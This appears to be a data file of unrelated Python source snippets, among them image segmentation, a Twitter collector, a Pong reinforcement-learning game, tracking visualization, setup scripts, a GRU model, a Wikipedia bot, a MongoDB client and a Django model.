approximation. The workflow is MIP -> local grad -> Otsu thresholding -> Connected components labelling ->
Filtering components based on their size (using either hand-threshold or KMeans to distinguish actual cells
from noise components.
:param sg: A segmenter object.
:return: None.
TODO: merge the two segmenting method into one, criterion of choice being AIC of the GMM.
"""
# mask_path = self.name.replace('w1', 'w3').replace('561', '405')
# cell_mask = io.imread(mask_path)
# self.mask = numpy.swapaxes(cell_mask, 0, 2)
with warnings.catch_warnings():
warnings.simplefilter('ignore')
if self._verbose > 0:
print('Segmenting...', end='', flush=True)
self.cells = sg.method(self.image_raw, self.nuclei_image)
if self._verbose > 0:
print('%i cells found.' % (numpy.unique(self.cells).shape[0] - 1))
|
12,907 | 8c51f8922479e62656231f8eff9fa12beb5c1ea3 | import collect
import db
def dist(targets, lo, hi, nbucket):
"""
distribute targets[lo, hi) into nbucket even partitions
the distribution is used by nbucket processes for parallel computation
"""
distribution = []
for _ in range(nbucket):
distribution.append([])
for i in range(lo, hi):
if 0 <= i and i < len(targets):
distribution[i % nbucket].append(targets[i])
return distribution
def runner(args):
"""
run tweets collection on a list of users using one set of apikey, (apikey, users) as args
the list of users is run sequentially
establish a new database connection for each user, and commit insertions and close connection when done
"""
apikey, users = args
api = collect.mk_api(apikey)
for user in users:
db_connection = db.mk_connection()
collect.collect_user_tweets(api, user, collect.mk_sql_insert_handler(db_connection))
db.close_connection(db_connection)
if __name__ == '__main__':
import csv
import multiprocessing
import sys
apikeys = [tuple(s.strip() for s in l.split(',')) for l in open('../../../.tw-apikeys')]
targets = [r[0] for r in ([l for l in csv.reader(open('../../connections/connection_as_follower_min5.csv'))][1:])]
# if one command line argument is supplied, treat it as a list of users
if len(sys.argv) == 2:
api = collect.mk_api(apikeys[0])
users = [int(s) for s in sys.argv[1].split(',')]
for user in users:
print(user)
db_connection = db.mk_connection()
collect.collect_user_tweets(api, user, collect.mk_sql_insert_handler(db_connection), err = 'raise')
db.close_connection(db_connection)
# if two command line arguments are supplied, treat them as [lo, hi) indexing into set targets
if len(sys.argv) == 3:
lo, hi = int(sys.argv[1]), int(sys.argv[2])
distribution = dist(targets, lo, hi, len(apikeys))
try:
with multiprocessing.Pool(processes = len(apikeys)) as pool:
[0 for _ in pool.imap_unordered(runner, list(zip(apikeys, distribution)))]
except KeyboardInterrupt:
error('KeyboardInterrupt')
pool.terminate()
|
12,908 | 930a5476dbb528d95ea10f350f69e44747fd3b0f | #Programa que ajude a sortear 1 aluno entre 4
import random
aluno1 = input('Digite o nome de um aluno: ').title()
aluno2 = input('Digite o nome de um aluno: ').title()
aluno3 = input('Digite o nome de um aluno: ').title()
aluno4 = input('Digite o nome de um aluno: ').title()
alunos = [aluno1, aluno2, aluno3, aluno4]
alunos.sort()
print(random.choice(alunos))
|
12,909 | 84da72777059a1a891f3ff3c8a78927c6ace1eee | #!/usr/bin/env python3
# Pong
# Written in 2013 by Julian Marchant <onpon4@riseup.net>
#
# To the extent possible under law, the author(s) have dedicated all
# copyright and related and neighboring rights to this software to the
# public domain worldwide. This software is distributed without any
# warranty.
#
# You should have received a copy of the CC0 Public Domain Dedication
# along with this software. If not, see
# <http://creativecommons.org/publicdomain/zero/1.0/>.
import sge
import Queue
import threading
import numpy.random as random
PADDLE_SPEED = 2
COMPUTER_PADDLE_SPEED = 2
PADDLE_VERTICAL_FORCE = 1 / 12
BALL_START_SPEED = 2
BALL_ACCELERATION = 0.1
BALL_MAX_SPEED = 15
SIM_STEP = 0.001
class glob:
# This class is for global variables. While not necessary, using a
# container class like this is less potentially confusing than using
# actual global variables.
players = [None, None]
ball = None
hud_sprite = None
bounce_sound = None
bounce_wall_sound = None
score_sound = None
game_in_progress = True
sim_time = 0.0
hits = [0, 0]
misses = [0, 0]
class Game(sge.Game):
def event_key_press(self, key, char):
if key == 'f8':
sge.Sprite.from_screenshot().save('screenshot.jpg')
elif key == 'escape':
self.event_close()
elif key in ('p', 'enter'):
self.pause()
def event_close(self):
m = "Are you sure you want to quit?"
if sge.show_message(m, ("No", "Yes")):
self.end()
def event_paused_key_press(self, key, char):
if key == 'escape':
# This allows the player to still exit while the game is
# paused, rather than having to unpause first.
self.event_close()
else:
self.unpause()
def event_paused_close(self):
# This allows the player to still exit while the game is paused,
# rather than having to unpause first.
self.event_close()
# def event_step(self, t):
# if glob.sim_time % 0.01 <= 0.001:
# glob.hud_sprite.draw_clear()
# glob.hud_sprite.draw_text("hud", "%.2f" % glob.sim_time, sge.game.width / 2,
# 0, color="white",
# halign=sge.ALIGN_RIGHT,
# valign=sge.ALIGN_TOP)
class ComputerPlayer(sge.StellarClass):
lock = None
queue = None
state_lock = None
state_queue = None
reward_lock = None
reward_queue = None
def __init__(self, lock, queue, reward_lock, reward_queue, player_num):
x = 32 if player_num == 0 else sge.game.width - 32
y = sge.game.height / 2
self.player_num = player_num
self.hit_direction = 1 if player_num == 0 else -1
self.lock = lock
self.queue = queue
self.reward_lock = reward_lock
self.reward_queue = reward_queue
super(ComputerPlayer, self).__init__(x, y, sprite="paddle_pc")
def event_step(self, time_passed):
move_direction = 0
self.lock.acquire()
while not self.queue.empty():
move_direction = self.queue.get()
# if self.player_num == 1: # don't want to double count
# glob.sim_time += SIM_STEP
self.lock.release()
self.yvelocity = move_direction * COMPUTER_PADDLE_SPEED
# Keep the paddle inside the window
if self.bbox_top < 0:
self.bbox_top = 0
elif self.bbox_bottom > sge.game.height:
self.bbox_bottom = sge.game.height
# if self.y > sge.game.height:
# self.y = 0
# if self.y < 0:
# self.y = sge.game.height
class Player(sge.StellarClass):
def __init__(self, player_num):
self.up_key = "up"
self.down_key = "down"
x = 32 if player_num == 0 else sge.game.width - 32
self.player_num = player_num
self.hit_direction = 1 if player_num == 0 else -1
y = sge.game.height / 2
super(Player, self).__init__(x, y, 0, sprite="paddle")
def event_step(self, time_passed):
# Movement
key_motion = (sge.get_key_pressed(self.down_key) -
sge.get_key_pressed(self.up_key))
self.yvelocity = key_motion * PADDLE_SPEED
# Keep the paddle inside the window
if self.y < 0:
self.y = 0
elif self.y > sge.game.height:
self.y = sge.game.height
class Ball(sge.StellarClass):
reward_lock = None
reward_queue = None
state_lock = None
state_queue = None
def __init__(self, reward_lock, reward_queue, state_lock, state_queue):
x = sge.game.width / 2
y = sge.game.height / 2
self.reward_lock = reward_lock
self.reward_queue = reward_queue
self.state_lock = state_lock
self.state_queue = state_queue
super(Ball, self).__init__(x, y, 1, sprite="ball")
def event_create(self):
self.serve()
def event_step(self, time_passed):
# Scoring
loser = None
if self.bbox_right < 0:
loser = 0
elif self.bbox_left > sge.game.width:
loser = 1
if loser is not None:
glob.misses[loser] += 1
self.serve(1 if loser == 0 else -1)
self.reward_lock[loser].acquire()
if not self.reward_queue[loser].full():
# self.reward_queue[loser].put(-abs(glob.ball.y - glob.players[loser].y) + 50)
self.reward_queue[loser].put(-1)
self.reward_lock[loser].release()
# Bouncing off of the edges
if self.bbox_bottom > sge.game.height:
self.bbox_bottom = sge.game.height
self.yvelocity = -abs(self.yvelocity) * 0.75
# self.yvelocity = 0
elif self.bbox_top < 0:
self.bbox_top = 0
self.yvelocity = abs(self.yvelocity) * 0.75
# self.yvelocity = 0
# if self.y > sge.game.height:
# self.y = 0
# if self.y < 0:
# self.y = sge.game.height
self.state_lock.acquire()
if not self.state_queue.full():
self.state_queue.put(glob.ball.x)
self.state_queue.put(glob.ball.y)
self.state_queue.put(glob.players[0].y)
self.state_queue.put(glob.players[1].y)
self.state_lock.release()
def event_collision(self, other):
if isinstance(other, (ComputerPlayer, Player)):
if other.player_num == 0:
self.bbox_left = other.bbox_right + 1
self.xvelocity = min(abs(self.xvelocity) + BALL_ACCELERATION, BALL_MAX_SPEED)
hitter = 0
else:
self.bbox_right = other.bbox_left - 1
self.xvelocity = max(-abs(self.xvelocity) - BALL_ACCELERATION, -BALL_MAX_SPEED)
hitter = 1
self.yvelocity += (self.y - other.y) * (PADDLE_VERTICAL_FORCE + 0.01)
glob.hits[hitter] += 1
self.reward_lock[hitter].acquire()
if not self.reward_queue[hitter].full():
self.reward_queue[hitter].put(1)
self.reward_lock[hitter].release()
def serve(self, direction=1):
self.x = sge.game.width / 2 + (200 if direction == -1 else -200)
self.y = random.randint(0, sge.game.height)
# Next round
self.xvelocity = BALL_START_SPEED * direction
self.yvelocity = 0
def main(players, action_lock, action_queue, reward_lock, reward_queue, state_lock, state_queue, seed=None):
random.seed(seed)
# Create Game object
Game(640, 480, fps=120)
# Load sprites
paddle_sprite = sge.Sprite(ID="paddle", width=8, height=80, origin_x=4,
origin_y=40)
paddle_sprite.draw_rectangle(0, 0, paddle_sprite.width,
paddle_sprite.height, fill="white")
paddle_sprite_pc = sge.Sprite(ID="paddle_pc", width=8, height=80, origin_x=4,
origin_y=40)
paddle_sprite_pc.draw_rectangle(0, 0, paddle_sprite.width,
paddle_sprite.height, fill="white")
ball_sprite = sge.Sprite(ID="ball", width=32, height=32, origin_x=16,
origin_y=16)
ball_sprite.draw_rectangle(0, 0, ball_sprite.width, ball_sprite.height,
fill="white")
# glob.hud_sprite = sge.Sprite(width=320, height=160, origin_x=160,
# origin_y=0)
# hud = sge.StellarClass(sge.game.width / 2, 0, -10, sprite=glob.hud_sprite,
# detects_collisions=False)
# Load backgrounds
layers = (sge.BackgroundLayer("ball", sge.game.width / 2, 0, -10000,
xrepeat=False),)
background = sge.Background (layers, "black")
# # Load fonts
# sge.Font('Liberation Mono', ID="hud", size=24)
# Create objects
for i in range(2):
glob.players[i] = Player(i) if players[i] == "human" else \
ComputerPlayer(action_lock[i], action_queue[i],
reward_lock[i], reward_queue[i], i)
glob.ball = Ball(reward_lock, reward_queue, state_lock, state_queue)
objects = glob.players + [glob.ball]
# Create rooms
room1 = sge.Room(objects, background=background)
sge.game.start()
if __name__ == '__main__':
main()
|
12,910 | c894a2351bbf2024303bd509a29d6bda4d9b2f4a | # vim: expandtab:ts=4:sw=4
import numpy as np
import colorsys
from .image_viewer import ImageViewer
import cv2
import time
def create_unique_color_float(tag, hue_step=0.41):
"""Create a unique RGB color code for a given track id (tag).
The color code is generated in HSV color space by moving along the
hue angle and gradually changing the saturation.
Parameters
----------
tag : int
The unique target identifying tag.
hue_step : float
Difference between two neighboring color codes in HSV space (more
specifically, the distance in hue channel).
Returns
-------
(float, float, float)
RGB color code in range [0, 1]
"""
h, v = (tag * hue_step) % 1, 1. - (int(tag * hue_step) % 4) / 5.
r, g, b = colorsys.hsv_to_rgb(h, 1., v)
return r, g, b
def create_unique_color_uchar(tag, hue_step=0.41):
"""Create a unique RGB color code for a given track id (tag).
The color code is generated in HSV color space by moving along the
hue angle and gradually changing the saturation.
Parameters
----------
tag : int
The unique target identifying tag.
hue_step : float
Difference between two neighboring color codes in HSV space (more
specifically, the distance in hue channel).
Returns
-------
(int, int, int)
RGB color code in range [0, 255]
"""
r, g, b = create_unique_color_float(tag, hue_step)
return int(255*r), int(255*g), int(255*b)
class NoVisualization(object):
"""
A dummy visualization object that loops through all frames in a given
sequence to update the tracker without performing any visualization.
"""
def __init__(self, min_frame):
self.frame_idx = min_frame
self.pre_frame = min_frame
def update_frame(self, idx):
self.pre_frame = idx
class Visualization(object):
def __init__(self, output_file, seq_name, min_frame):
image_shape = 960, 540
self.viewer = ImageViewer(output_file, seq_name, 5, image_shape)
self.viewer.thickness = 2
self.pre_frame = min_frame
self.frame_idx = min_frame
def update_frame(self, idx):
self.pre_frame = idx
def set_image(self, image):
self.viewer.image = image
def draw_groundtruth(self, track_ids, boxes):
self.viewer.thickness = 2
for track_id, box in zip(track_ids, boxes):
self.viewer.color = create_unique_color_uchar(track_id)
self.viewer.rectangle(*box.astype(np.int), label=str(track_id))
def draw_detections(self, detections, p):
self.viewer.thickness = 2
self.viewer.color = 0, 0, 255
self.viewer.polygen(p)
for i, detection in enumerate(detections):
self.viewer.rectangle(*detection.tlwh)
def draw_trackers(self, tracks):
self.viewer.thickness = 2
for track in tracks:
if not track.is_confirmed() or track.time_since_update > 1:
continue
# if track.label == 'truck':
# self.viewer.thickness = 6
self.viewer.color = create_unique_color_uchar(track.track_id)
self.viewer.rectangle(
*track.to_tlwh().astype(np.int), label=str(track.track_id))
self.viewer.trajectory(track.center)
def draw_kcf_trackers(self, tracks):
self.viewer.thickness = 2
for track in tracks:
if not track.is_confirmed() or track.time_since_update > 1:
continue
# if track.label == 'truck':
# self.viewer.thickness = 6
self.viewer.color = create_unique_color_uchar(track.track_id)
r = track.bbox
self.viewer.rectangle(int(r[0]), int(r[1]), int(r[2]), int(r[3]), label=str(track.track_id)) |
12,911 | 6bc0ae273fecb1736cac256b5c7c939eebcfd676 | from __future__ import division # confidence high
pkg = "stsci.numdisplay"
setupargs = {
'version' : "1.5",
'description' : "Package for displaying numpy arrays in DS9",
'author' : "Warren Hack",
'maintainer_email': "help@stsci.edu",
'url' : "",
'license' : "http://www.stsci.edu/resources/software_hardware/pyraf/LICENSE",
'platforms' : ["any"],
'package_dir' : { 'stsci.numdisplay' : 'lib/stsci/numdisplay' },
'data_files' : [ ( 'stsci/numdisplay', ['lib/stsci/numdisplay/imtoolrc', 'LICENSE.txt','lib/stsci/numdisplay/ichar.dat'] )],
}
|
12,912 | 1e21d420b57660b20a5f6220f08306be5bf8cec4 | import json
import numpy as np
from keras import Sequential
from keras.callbacks import TensorBoard
from keras.layers import LSTM, Dense, RepeatVector, TimeDistributed, GRU
from data_prep import gen_cosine_amp_for_supervised as gen_testdata
from data_prep import print_data, series_to_supervised
from ufcnn import ufcnn_model_concat
from ufcnn_own import ufcnn_model
sequence_length = 672 # same as in Roni Mittelman's paper - this is 2 times 32 - a line in Ronis input contains 33 numbers, but 1 is time and is omitted
output_sequence_length = 192
features = 1 # guess changed Ernst 20160301
nb_filter = 50 # same as in Roni Mittelman's paper
filter_length = 5 # same as in Roni Mittelman's paper
output_dim = 1
batch_size = 64
# cos, train_y = gen_testdata(sequence_length*100)
with open('./ecto.json') as data_file:
data = json.load(data_file)
tb_callback = TensorBoard(log_dir='./logs/lstm/672_192', histogram_freq=10,
batch_size=batch_size, write_graph=True, write_grads=True,
write_images=True, embeddings_freq=0,
embeddings_layer_names=None, embeddings_metadata=None)
sell = np.array([float(d['sell']) for d in data])
sell = sell[::-1]
sell = np.insert(np.diff(sell), 0, 0)
sell = sell.reshape(-1, 1)
sell = series_to_supervised(sell, n_in=sequence_length, n_out=output_sequence_length)
train_x = sell.values[:, :sequence_length]
train_x = train_x.reshape(-1, sequence_length, 1)
train_y = sell.values[:, sequence_length:]
train_y = train_y.reshape(-1, output_sequence_length, 1)
# # train_y input data shape: (batch_size, timesteps, data_dim)
model = Sequential()
model.add(GRU(150,
return_sequences=False,
input_shape=(sequence_length, features),
dropout=0.4,
#batch_input_shape=(batch_size, sequence_length, features),
stateful=False))
model.add(RepeatVector(output_sequence_length))
model.add(GRU(150, return_sequences=True, dropout=0.4, stateful=False))
model.add(TimeDistributed(Dense(output_dim, activation='linear')))
model.compile(loss='mean_squared_error',
optimizer='adam',
metrics=['accuracy'])
model.fit(train_x, train_y, validation_split=0.1,
batch_size=batch_size,
epochs=100,
shuffle=False,
callbacks=[tb_callback]
)
# predicted = model.predict(x=cos, batch_size=batch_size)
|
12,913 | 10758b283f40f515a55bc0a4e5336c683bf700c7 | def namelist():
#This first set of instructions formulates the list to be aligned
y = []
x = input ("Enter strings (end with DONE):\n")
if x == str("DONE"):
s=2
else:
y.append(x)
while x != "DONE":
x = input ('')
y.append (x)
if x == str("DONE"):
del y[len(y)-1]
# This list assesses the length of all the names in the list
b=[]
for a in y:
c = len(a)
b.append(c)
c=0
# This part finds the largest name in the list
start = 0
for listnum in b:
if listnum > start:
start = int(listnum)
# This prints the list right-aligned
space = 0
print ("")
print ("Right-aligned list:")
for word in y:
space = start - len(word)
print (" "*space, word,sep="")
namelist() |
12,914 | e4accced84e18cfb2bbb01cb334450b002d2e4ea | L = [12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38]
x = L[::-1]
print(x)
|
12,915 | 20989f52c02bb0fe7d5aaec9bd9c7f2aff872833 | # coding:utf-8
import csv, codecs
import re
# ๅๅค็๏ผๆๅจๆฟๆขcsvไธญ็้ๅท ๅ ้คไธ่ฏพๆถ้ด ๅฐ็น ๅ็ญ
'''
col0 ๅผ่ฏพ็ถๆ
col1 ่ฏพ็จๅ็งฐ
col2 ๅญฆๅ
col3 ่ๆ ธๆนๅผ
col4 ่ฏพ็จๆง่ดจ
col5 ไปป่ฏพๆๅธ
col6 ้่ฏพ่ฏพๅท
col7 ่ตทๆญขๅจ
col8 ไธ่ฏพๆถ้ด ele[9]
col9 ไธ่ฏพๅฐ็น ele[10]
col10 ๅผ่ฏพๅญฆ้ข ele[8]
col11 ๅ็ญไฟกๆฏ ele[11]
'''
inputfile = './data/csv/2019-2020-2_split.csv'
outputfile = './data/csv/2019-2020-2-processed.csv'
fp = open(inputfile, 'r', encoding='utf-8')
lines = fp.readlines()
new_lines = []
for ele in lines[1:]:
ele = ele.split(",")
# col0-6 maintain
col0_6 = ele[0:7]
# 7 ไฟฎๆน ๆ ๆฅ
col7 = ele[7]
if 'ๆ' in ele[7]:
col7 = col7.replace("ๆ","~")
col7 = col7.replace("ๆฅ","")
# col8 ไธ่ฏพๆถ้ด refer to ele[9]
col8 = ele[9]
if 'title' in ele[9]:
reg = re.compile(r'\=\"(.*?)\">')
col8 = re.findall(reg,ele[9])[0]
elif 'td' in ele[9]:
reg = re.compile(r'<td>(.*?)</td>')
col8 = re.findall(reg,ele[9])[0]
# 9 refer to 13
col9 = ele[10]
if 'title' in ele[10]:
reg = re.compile(r'\=\"(.*?)\">')
col9 = re.findall(reg,ele[10])[0]
elif 'td' in ele[10]:
reg = re.compile(r'<td>(.*?)</td>')
col9 = re.findall(reg,ele[10])[0]
# 11 refer to 14
col10 = ele[11]
if 'title' in ele[11]:
reg = re.compile(r'\=\"(.*?)\">')
col11 = re.findall(reg,ele[11])[0]
elif 'td' in ele[11]:
reg = re.compile(r'<td>(.*?)</td>')
col11 = re.findall(reg,ele[11])[0]
# 10 maintain
col10 = ele[8]
cur_line = col0_6 + [str(col7)] + [str(col8)] + [str(col9)] + [str(col10)] + [str(col11)]
new_lines.append(cur_line)
with open(outputfile, 'w', newline='',encoding="utf-8") as csv_file:
csv_file.write(codecs.BOM_UTF8.decode())
writer = csv.writer(csv_file)
for row in new_lines:
writer.writerow(row)
# ๅๅค็๏ผๅ ้ค่ฑๆๅผๅท ็ฉบๆ ผ้็ฝฎ ๅ ้คๆๅไธ่ก |
12,916 | e16dce6ee4038c52f55588a4ed8f5bfcf7810b09 | import re
import editor
import pickle
import tools
month_dic = {"01": "ัะฝะฒะฐัั", "02": "ัะตะฒัะฐะปั", "03": "ะผะฐััะฐ", "04": "ะฐะฟัะตะปั", "05": "ะผะฐั", "06": "ะธัะฝั",
"07": "ะธัะปั", "08": "ะฐะฒะณัััะฐ", "09": "ัะตะฝััะฑัั", "10": "ะพะบััะฑัั", "11": "ะฝะพัะฑัั", "12": "ะดะตะบะฐะฑัั"}
month_dic2 = {"01": "ะฏะฝะฒะฐัั", "02": "ะคะตะฒัะฐะปั", "03": "ะะฐัั", "04": "ะะฟัะตะปั", "05": "ะะฐะน", "06": "ะัะฝั",
"07": "ะัะปั", "08": "ะะฒะณััั", "09": "ะกะตะฝััะฑัั", "10": "ะะบััะฑัั", "11": "ะะพัะฑัั", "12": "ะะตะบะฐะฑัั"}
user_prefix = ["u", "U", "user", "User", "ั", "ะฃ", "ััะฐััะฝะธะบ", "ััะฐััะฝะธัะฐ", "ะฃัะฐััะฝะธะบ", "ะฃัะฐััะฝะธัะฐ"]
def good_stater():
# ะดะพััะฐะตะผ ัะฐะฑะพัะธะน ัะปะพะฒะฐัั ะธะท ัะฐะนะปะฐ
work_dic = {}
try:
work_dic = pickle.load(open("good_data", "rb"))
except:
print("no data. create new")
pickle.dump(work_dic, open("good_data", "wb"))
# ะธะท ะฝะตะณะพ ะธะทะฒะปะตะบะฐะตะผ ัะฟะธัะพะบ ะฝะตะทะฐะบะพะฝัะตะฝะฝัั
ะดะฐั
nonfinish_date_list = []
try:
nonfinish_date_list = work_dic["nonfinish_date_list"]
except:
print("no nonfinish_date_list")
work_dic["nonfinish_date_list"] = nonfinish_date_list
pickle.dump(work_dic, open("good_data", "wb"))
print("found "+str(len(nonfinish_date_list))+" nonfinished dates")
cur_date = tools.get_date_str()
cur_pos = 0
is_last = False
while not is_last:
work_dic = pickle.load(open("good_data", "rb"))
nonfinish_date_list = work_dic["nonfinish_date_list"]
#nonfinish_date_list = ["270414"] #fixme
#is_last = True
if len(nonfinish_date_list) == 0:
print("ะทะฐะบะพะฝัะธะปัั ัะฟะธัะพะบ")
return
print(nonfinish_date_list)
date_str = nonfinish_date_list[cur_pos]
if date_str == cur_date:
is_last = True
if date_str == "2011":
title_date = date_str
else:
d = date_str[:2]
if d[0] == "0":
d = d[1]
title_date = d + " " + month_dic[date_str[2:4]] + " 20" + date_str[4:6]
print(title_date + "\n")
base_name = "ะะธะบะธะฟะตะดะธั:ะะฐะฝะดะธะดะฐัั ะฒ ะดะพะฑัะพัะฝัะต ััะฐััะธ/"
page_name = base_name + title_date
ed = editor.Editor(page_name)
date_data = ed.get_text()
if date_data is None:
print("no date page!")
nonfinish_date_list.remove(date_str)
work_dic["nonfinish_date_list"] = nonfinish_date_list
pickle.dump(work_dic, open("good_data", "wb"))
continue
if date_str in work_dic:
artdics_dic = work_dic[date_str]
else:
artdics_dic = {}
is_done = True
date_art_list = re.findall("[^=]==[^=][^\[]*\[\[[^\]]+\]\][^=]*==[^=]", date_data)
for i in range(0, len(date_art_list), 1):
art = date_art_list[i]
art_name = art[art.find("[[")+2:art.find("]]")]
if art_name in artdics_dic:
art_dic = artdics_dic[art_name]
is_new = False
else:
art_dic = {}
art_dic["name"] = art_name
is_new = True
print(art_name)
tmp_data = date_data[date_data.find(art):]
art_data = tmp_data
try:
art_data = tmp_data[:tmp_data.find(date_art_list[i+1])]
except:
pass
if is_new:
nominator = ""
for prefix in user_prefix:
try:
nominator = str(re.search("\[\["+prefix+":[^\|]+\|", art_data).group())[:-1]
nominator = nominator[nominator.find(":")+1:]
except:
pass
if nominator != "":
break
if nominator == "":
nominator = "Unknown"
art_dic["nominator"] = nominator
nomdate = date_str
art_dic["nomdate"] = nomdate
print("ะะพะผะธะฝะฐัะธั: " + nominator + " - " + nomdate)
if art_data.find("=== ะัะพะณ ===") != -1:
summ_data = art_data[art_data.find("=== ะัะพะณ ==="):]
if summ_data.find("{{ะกะดะตะปะฐะฝะพ|ะกัะฐััั ะธะทะฑัะฐะฝะฐ}}") != -1:
summary = "good"
elif summ_data.find("{{ะะต ัะดะตะปะฐะฝะพ|ะกัะฐััั ะฝะต ะธะทะฑัะฐะฝะฐ}}") != -1:
summary = "notgood"
else:
summary = "Unknown"
summator = ""
for prefix in user_prefix:
try:
summator = str(re.search("\[\["+prefix+":[^\|]+\|", summ_data).group())[:-1]
summator = summator[summator.find(":")+1:]
except:
pass
if summator != "":
break
if summator == "":
summator = "Unknown"
tmp = re.search("\d\d:\d\d.*\(UTC\)", summ_data).group()
tmp = re.search("[\d]+[ \w]+\d\d\d\d", tmp).group()
d = re.search("[\d]+", tmp).group()
if len(d) == 1:
d = "0" + d
m = re.search("[^\d^\s]+", tmp).group()
for key in month_dic:
if month_dic[key] == m:
m = key
break
summdate = d + m + "14"
print("ะะทะฑัะฐะฝะธะต: " + summator + " - " + summdate + " - " + summary)
else:
summary = ""
summator = ""
summdate = ""
if summary == "":
is_done = False
art_dic["summary"] = summary
art_dic["summator"] = summator
art_dic["summdate"] = summdate
ed = editor.Editor(art_name)
art_text = ed.get_text()
if art_text is None:
art_curstate = "n"
else:
if art_text.find("ะะทะฑัะฐะฝะฝะฐั ััะฐััั") != -1:
art_curstate = "f"
elif art_text.find("ะฅะพัะพัะฐั ััะฐััั") != -1:
art_curstate = "g"
elif art_text.find("ะะพะฑัะพัะฝะฐั ััะฐััั") != -1:
art_curstate = "d"
else:
art_curstate = ""
art_dic["art_curstate"] = art_curstate
print("ะจะฐะฑะปะพะฝ ะฒ ััะฐััะต: "+art_curstate)
talk_name = "ะะฑััะถะดะตะฝะธะต:" + art_name
ed = editor.Editor(talk_name)
talk_text = ed.get_text()
if talk_text is None:
talk_curstate = "n"
else:
if talk_text.find("ะกะพะพะฑัะตะฝะธะต ะะก") != -1:
talk_curstate = "f"
elif talk_text.find("ะกะพะพะฑัะตะฝะธะต ะฅะก") != -1:
talk_curstate = "g"
elif talk_text.find("ะกะพะพะฑัะตะฝะธะต ะะก") != -1:
talk_curstate = "d"
else:
talk_curstate = ""
art_dic["talk_curstate"] = talk_curstate
print("ะจะฐะฑะปะพะฝ ะฝะฐ ะกะ: "+talk_curstate)
print(art_dic)
artdics_dic[art_name] = art_dic
work_dic[date_str] = artdics_dic
if is_done:
nonfinish_date_list.remove(date_str)
else:
cur_pos += 1
work_dic["nonfinish_date_list"] = nonfinish_date_list
pickle.dump(work_dic, open("good_data", "wb"))
def make_log():
res_dic = {}
work_dic = work_dic = pickle.load(open("good_data", "rb"))
#print(work_dic)
for date_str in work_dic:
if date_str == "nonfinish_date_list":
continue
#print(date_str)
arts_dic = work_dic[date_str]
for art_name in arts_dic:
#print(art_name)
art_dic = arts_dic[art_name]
#print(art_dic)
status = art_dic["summary"]
summator = art_dic["summator"]
art_state = {}
art_state["name"] = art_name
art_state["status"] = status
art_state["summator"] = summator
summdate = art_dic["summdate"]
d = summdate[:2]
m = summdate[2:4]
y = summdate[4:]
#print(summator + " - " + d+m+y + " - " + summdate)
if y in res_dic:
ydic = res_dic[y]
else:
ydic = {}
if m in ydic:
mdic = ydic[m]
else:
mdic = {}
if d in mdic:
ddic = mdic[d]
else:
ddic = {}
ddic[art_name] = art_dic
mdic[d] = ddic
ydic[m] = mdic
res_dic[y] = ydic
#print(res_dic)
good_count = 0
cur_good_count = 0
lines = ""
for y in range(14, 20):
if str(y) not in res_dic:
continue
else:
ydic = res_dic[str(y)]
for m in range(1, 13):
sm = str(m)
if len(sm) == 1:
sm = "0" + sm
if sm not in ydic:
continue
else:
mdic = ydic[sm]
for d in range(1, 32):
sd = str(d)
if len(sd) == 1:
sd = "0" + sd
if sd not in mdic:
continue
else:
ddic = mdic[sd]
for art_name in ddic:
art_dic = ddic[art_name]
#print(art_dic)
if art_dic["summary"] == "good":
stt = "ะธะทะฑัะฐะฝะฐ"
good_count += 1
elif art_dic["summary"] == "notgood":
stt = "ะพัะฟัะฐะฒะปะตะฝะฐ ะฝะฐ ะดะพัะฐะฑะพัะบั"
else:
if art_dic["art_curstate"] == "d" or art_dic["talk_curstate"] == "d":
stt = "ะธะทะฑัะฐะฝะฐ"
good_count += 1
else:
continue
if art_dic["art_curstate"] == "d":
cur_good_count += 1
lines += "# ะกัะฐััั [["+art_name+"]] "+stt+" ััะฐััะฝะธะบะพะผ [[u:"+art_dic["summator"]+"|"+art_dic["summator"]+"]] "+str(d)+" "+month_dic[sm]+" 20"+str(y)+"\n"
print(lines)
print("good: "+str(good_count))
print("current good: "+str(cur_good_count))
#ed = editor.Editor("ะะธะบะธะฟะตะดะธั:ะะฐะฝะดะธะดะฐัั ะฒ ะดะพะฑัะพัะฝัะต ััะฐััะธ/log")
#ed.put_art(lines, "try again")
def first_run():
work_dic = {}
nonfinish_date_list = ["2011"]
for y in range(13, 16):
for m in range(1, 13):
strm = str(m)
if len(strm) == 1:
strm = "0" + strm
for d in range(1, 32, 1):
strd = str(d)
if len(strd) == 1:
strd = "0" + strd
date_str = strd + strm + str(y)
nonfinish_date_list.append(date_str)
print(date_str)
work_dic["nonfinish_date_list"] = nonfinish_date_list
pickle.dump(work_dic, open("good_data", "wb")) |
12,917 | 0d22d51506bb43892619b48b30defdd31e2e7c55 | from setuptools import setup
setup(
name='pytorch-cnn-visualization',
version='0.2.6',
packages=['pytorch_cnn_visualization'],
package_dir={'pytorch_cnn_visualization': 'pytorch_cnn_visualization'},
package_data={'pytorch_cnn_visualization': ['data/*.json', 'misc_scripts/*.py']},
license='MIT',
description='Several CNN visualization implemented in Pytorch',
long_description=open('README.md').read(),
install_requires=['torch==0.3.1', 'torchvision==0.2.0', 'scipy', 'matplotlib'],
url='https://github.com/limyunkai19/pytorch-cnn-visualization',
author='Lim Yun Kai',
author_email='yunkai96@hotmail.com'
)
|
12,918 | d7cd1fe02ee4d72851cb18b4a8d92abb50a8b03a | # coding: utf8
import message
|
12,919 | 5459c3e800beef9d85bdcbb8bf6816c2cd72f10a | from django import forms
from .models import Articles
class PostForm(forms.ModelForm):
class Meta:
model = Articles
fields = ('id_author','title','text',) |
12,920 | 1fb335e081d5e6eddcf8087fb6b8a0ff7a6e2842 | """"mongodb client"""
from pymongo import MongoClient
MONGO_DB_HOST = 'localhost'
MONGO_DB_PORT = '27017' # default port
DB_NAME = 'tap-news' #database name which may connect many collection
# singelton client
client = MongoClient("%s:%s" %(MONGO_DB_HOST, MONGO_DB_PORT))
# if there is no argument,use the defualt DB_NAME
# Othewise, use the passed in argument
def get_db(db=DB_NAME):
"""get database instance"""
db = client[db]
return db
|
12,921 | 8d891269011998db94ec8da24aab3143daef2748 | # -*- coding: utf-8 -*-
from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
class Forum(models.Model):
title = models.CharField('ๅใใใซใใๅ ดๅใฏใใใซ่ชฌๆใๅ
ฅใใ', max_length=60)
def __unicode__(self):
"""
ใชใใธใงใฏใใๆๅญๅใซ่กจ็พใใ้ใซไฝฟใใใใ
